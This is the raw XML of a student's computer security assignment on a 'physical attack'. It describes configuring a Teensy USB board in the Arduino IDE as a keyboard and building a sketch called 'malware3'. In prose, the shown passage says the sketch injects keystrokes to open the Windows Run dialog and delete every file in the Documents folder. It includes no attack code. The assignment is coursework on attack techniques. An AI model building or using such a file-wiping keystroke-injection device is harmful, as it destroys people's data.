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0F67F" w14:textId="3A9AF1F4" w:rsidR="00846220" w:rsidRDefault="00846220"/>
    <w:p w14:paraId="5C3DA9F1" w14:textId="3CF726A6" w:rsidR="008619A8" w:rsidRDefault="008619A8"/>
    <w:p w14:paraId="49D538F7" w14:textId="6338E894" w:rsidR="008619A8" w:rsidRDefault="008619A8"/>
    <w:p w14:paraId="7002ED56" w14:textId="654100B2" w:rsidR="008619A8" w:rsidRDefault="003479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7D2BE" wp14:editId="24B29548">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1189355</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>48260</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3257550" cy="1314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31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D0059" w14:textId="77777777" w:rsidR="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
                            <w:pPr>
                              <w:jc w:val="center"/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 w:rsidRPr="008619A8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Physical Attack</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1739BCDD" w14:textId="2CD68633" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
                            <w:pPr>
                              <w:jc w:val="center"/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Ass</w:t>
                            </w:r>
                            <w:r w:rsidRPr="008619A8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07D2BE" id="Oval 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:93.65pt;margin-top:3.8pt;width:256.5pt;height:103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4E7D0059" w14:textId="77777777" w:rsidR="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:i/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="008619A8">
                        <w:rPr>
                          <w:b/>
                          <w:i/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Physical Attack</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1739BCDD" w14:textId="2CD68633" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr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i/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Ass</w:t>
                      </w:r>
                      <w:r w:rsidRPr="008619A8">
                        <w:rPr>
                          <w:b/>
                          <w:i/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>ignment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E8CAB2E" w14:textId="62B16DB2" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="4BCA354F" w14:textId="276BE3E7" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="7112E457" w14:textId="7CCECC1F" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="2479BE78" w14:textId="6D8CC926" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="4D0DA28D" w14:textId="1F21DCDB" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="71228B08" w14:textId="553CAB10" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="137B7A14" w14:textId="03070F03" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="40D78CFA" w14:textId="28483714" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="7575C617" w14:textId="262570F3" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="46A5AB98" w14:textId="6380D609" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="1D866DA2" w14:textId="37B2FDA0" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="352A295E" w14:textId="6DE0ED0B" w:rsidR="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="69B7D55D" w14:textId="54C0B745" w:rsidR="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8160"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C77266" w14:textId="14F71229" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="5966B127" w14:textId="2B709044" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="4C071991" w14:textId="0E1ED990" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="2E204518" w14:textId="02C86038" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="005A25F9" w:rsidP="008619A8">
      <w:r>
        <w:softHyphen/>
      </w:r>
      <w:r>
        <w:softHyphen/>
      </w:r>
      <w:r>
        <w:softHyphen/>
      </w:r>
      <w:r>
        <w:softHyphen/>
      </w:r>
      <w:r>
        <w:softHyphen/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0010A" w14:textId="724584B7" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="000E0897" w:rsidP="008619A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FBEA6" wp14:editId="700162E4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4114800" cy="19716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971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59EFB" w14:textId="77AF3F56" w:rsidR="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A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 w:rsidRPr="008619A8"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By,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</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3D80D9AC" w14:textId="3E944725" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/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</w:t>
                            </w:r>
                            <w:r w:rsidR="005A25F9"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619A8"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Bashetty Arun Kumar,</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C784D1C" w14:textId="7B505A38" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8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619A8"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Computer Security</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="54A21C9D" w14:textId="077CD00A" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8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619A8"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EPITA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FBEA6" id="Rectangle: Rounded Corners 3" o:spid="_x0000_s1027" style="position:absolute;margin-left:0;margin-top:2.25pt;width:324pt;height:15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6C59EFB" w14:textId="77AF3F56" w:rsidR="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
                      <w:pP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bookmarkStart w:id="1" w:name="_GoBack"/>
                      <w:r w:rsidRPr="008619A8"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>By,</w:t>
                      </w:r>
                      <w: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 xml:space="preserve">    </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3D80D9AC" w14:textId="3E944725" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/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 xml:space="preserve">          </w:t>
                      </w:r>
                      <w:r w:rsidR="005A25F9"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Pr="008619A8"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>Bashetty Arun Kumar,</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4C784D1C" w14:textId="7B505A38" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/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r w:rsidRPr="008619A8"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>Computer Security</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="54A21C9D" w14:textId="077CD00A" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/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r w:rsidRPr="008619A8"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>EPITA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30C2E2" w14:textId="074F5F14" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="7B1A0B13" w14:textId="294C6182" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="61918A6E" w14:textId="27789B8B" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="58F3E774" w14:textId="200343AE" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="38482B53" w14:textId="43B2E312" w:rsidR="008619A8" w:rsidRPr="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="40BE142A" w14:textId="571854F1" w:rsidR="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8"/>
    <w:p w14:paraId="5B7F788B" w14:textId="444041EA" w:rsidR="008619A8" w:rsidRDefault="008619A8" w:rsidP="008619A8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60833BF3" w14:textId="77777777" w:rsidR="005A25F9" w:rsidRDefault="005A25F9" w:rsidP="008619A8"/>
    <w:p w14:paraId="50D4D719" w14:textId="0C241D43" w:rsidR="00605508" w:rsidRPr="00605508" w:rsidRDefault="00605508" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605508">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Using Teensy USB Development Board:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00705532" w14:textId="7081108A" w:rsidR="00605508" w:rsidRDefault="00605508" w:rsidP="008619A8"/>
    <w:p w14:paraId="226472E0" w14:textId="1DDD5D06" w:rsidR="00605508" w:rsidRPr="00605508" w:rsidRDefault="00605508" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605508">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Easily Programmable via Arduino0020 IDE or WinAVR compiler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416788CC" w14:textId="3B7A9CCA" w:rsidR="00605508" w:rsidRPr="00605508" w:rsidRDefault="00605508" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605508">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Small device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5D1088" w14:textId="77777777" w:rsidR="00605508" w:rsidRDefault="00605508" w:rsidP="008619A8"/>
    <w:p w14:paraId="2A2A3B82" w14:textId="7FF751FF" w:rsidR="0085741A" w:rsidRPr="00A5413F" w:rsidRDefault="00605508" w:rsidP="008619A8">
      <w:r>
        <w:t xml:space="preserve">                                          </w:t>
      </w:r>
      <w:r w:rsidRPr="00605508">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53A0EBB5" wp14:editId="4E23AB29">
            <wp:extent cx="2581275" cy="1473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77" cy="147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54B2" w14:textId="0A394A10" w:rsidR="0085741A" w:rsidRPr="0085741A" w:rsidRDefault="0085741A" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085741A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Steps I followed to insert malware into system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67724565" w14:textId="45775459" w:rsidR="0085741A" w:rsidRDefault="0085741A" w:rsidP="0085741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5741A">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>First, I installed Arduino 1.8.6 in my windows from Arduino home page and opened once, because to check the file location,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEBC09D" w14:textId="77777777" w:rsidR="0085741A" w:rsidRPr="0085741A" w:rsidRDefault="0085741A" w:rsidP="0085741A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2343CB04" w14:textId="12662946" w:rsidR="0085741A" w:rsidRDefault="0085741A" w:rsidP="0085741A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PATH=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0085741A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>C:\Program Files\arduino-1.8.6-windows\arduino-1.8.6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744A221E" w14:textId="77777777" w:rsidR="0085741A" w:rsidRPr="0085741A" w:rsidRDefault="0085741A" w:rsidP="0085741A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779A4343" w14:textId="00BFC19D" w:rsidR="0085741A" w:rsidRDefault="0085741A" w:rsidP="0085741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5741A">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">downloaded </w:t>
      </w:r>
      <w:r w:rsidRPr="0085741A">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>teensy from teensy web page and I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> installed software inside above</w:t>
      </w:r>
      <w:r w:rsidRPr="0085741A">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> a path, where I installed my Arduino file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5773594F" w14:textId="3DD6A1B0" w:rsidR="0085741A" w:rsidRDefault="0085741A" w:rsidP="0085741A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: While we install teensy in system, we must connect your Teensy board to computer, otherwise it will be shown </w:t>
      </w:r>
      <w:r w:rsidRPr="0085741A">
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ERROR.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E05BE3B" w14:textId="449A146C" w:rsidR="0085741A" w:rsidRDefault="0085741A" w:rsidP="0085741A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Before doing coding part, we must set IDE Configuration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E5A7C" w14:textId="77777777" w:rsidR="005A25F9" w:rsidRDefault="005A25F9" w:rsidP="0085741A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA037EE" w14:textId="4E11AAF5" w:rsidR="00A5413F" w:rsidRDefault="00A5413F" w:rsidP="005A25F9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5413F">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-Tools-&gt;board-&gt;Teensy2.0/3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D854A5" w14:textId="77777777" w:rsidR="005A25F9" w:rsidRPr="00A5413F" w:rsidRDefault="005A25F9" w:rsidP="005A25F9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5898FDD8" w14:textId="5E6CB16E" w:rsidR="005A25F9" w:rsidRDefault="00A5413F" w:rsidP="005A25F9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="128" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5413F">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-Tools-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5413F">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>USBtypes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5413F">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5413F">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Keyboard+Mouse+Joystick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50DD8CBB" w14:textId="77777777" w:rsidR="005A25F9" w:rsidRPr="00A5413F" w:rsidRDefault="005A25F9" w:rsidP="005A25F9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="128" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1D2071" w14:textId="77777777" w:rsidR="00A5413F" w:rsidRPr="00A5413F" w:rsidRDefault="00A5413F" w:rsidP="005A25F9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5413F">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-Tools-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5413F">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>KeyboardLayout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5413F">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-&gt;French/English;-)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D9FF4" w14:textId="77777777" w:rsidR="005A25F9" w:rsidRDefault="005A25F9" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0C6679" w14:textId="5569A1B6" w:rsidR="0085741A" w:rsidRPr="00760162" w:rsidRDefault="0085741A" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760162">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>After connecting I checked the software using Blink program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580FF647" w14:textId="5024BE23" w:rsidR="0085741A" w:rsidRPr="00760162" w:rsidRDefault="0085741A" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760162">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>We can follow these steps to see blink program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F559FE7" w14:textId="77777777" w:rsidR="00A5413F" w:rsidRPr="00760162" w:rsidRDefault="00A5413F" w:rsidP="00A5413F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760162">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File=&gt;Examples=&gt;01.Basics=&gt;Blink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9F1E2E" w14:textId="2B2734C0" w:rsidR="00A5413F" w:rsidRPr="00760162" w:rsidRDefault="00760162" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760162">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00760162">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If you click on blink you will get below screenshot,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5AEC88" w14:textId="27EA8DA9" w:rsidR="00760162" w:rsidRPr="00760162" w:rsidRDefault="00760162" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr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3D0A1978" wp14:editId="48188B6A">
            <wp:extent cx="54197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DC2F" w14:textId="2AE984A4" w:rsidR="0085741A" w:rsidRPr="00760162" w:rsidRDefault="00760162" w:rsidP="00760162">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="FF0000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Next step, you click on verify, it will </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>verifying</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> and showing below screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9252E1" w14:textId="506699CF" w:rsidR="00760162" w:rsidRPr="00760162" w:rsidRDefault="00760162" w:rsidP="005A25F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr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2D04AE79" wp14:editId="2799BFFA">
            <wp:extent cx="4638675" cy="3143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EE33" w14:textId="77777777" w:rsidR="005A25F9" w:rsidRDefault="00760162" w:rsidP="008619A8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760162">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Next step, you can click on upload it will upload inside teensy and you can see the Blinking on teensy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206299BE" w14:textId="38566D2B" w:rsidR="00E706AC" w:rsidRPr="005A25F9" w:rsidRDefault="00E706AC" w:rsidP="008619A8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5A25F9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Arduino File</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706A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E069992" w14:textId="368B7DB7" w:rsidR="00E706AC" w:rsidRDefault="00E706AC" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>I created my Arduino file as malware3 and when I clicked on verifying it is showing that my program is done compiling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836CCEB" w14:textId="711E90B1" w:rsidR="00760162" w:rsidRDefault="00584287" w:rsidP="008619A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CA1D48E" wp14:editId="3FBA0D34">
            <wp:extent cx="5731510" cy="5800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1A46" w14:textId="00F5C57B" w:rsidR="0085741A" w:rsidRDefault="0085741A" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA5B4F4" w14:textId="431BFA77" w:rsidR="00E706AC" w:rsidRDefault="00E706AC" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="236475FB" w14:textId="6B68FEE8" w:rsidR="00E706AC" w:rsidRDefault="00E706AC" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>I am trying to capture the video as proof, it is not possible to capture in my laptop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3989BD" w14:textId="77777777" w:rsidR="00584287" w:rsidRDefault="00584287" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0517252B" w14:textId="77777777" w:rsidR="00ED77C5" w:rsidRDefault="00ED77C5" w:rsidP="008619A8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0869FCCB" w14:textId="0596CBDA" w:rsidR="00584287" w:rsidRDefault="00584287" w:rsidP="008619A8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lastRenderedPageBreak/>
        <w:t>Process of My code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6694492B" w14:textId="2CB2E97E" w:rsidR="00584287" w:rsidRDefault="00584287" w:rsidP="008619A8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The main aim of my program is to delete the all files inside the document folder,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4679F5" w14:textId="0F4280AB" w:rsidR="00584287" w:rsidRDefault="00584287" w:rsidP="008619A8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When I run the teensy USB, it will automatically Open the search option in Windows (WINDOWS_GUI+KEY_R),</w:t>
      </w:r>
    </w:p>
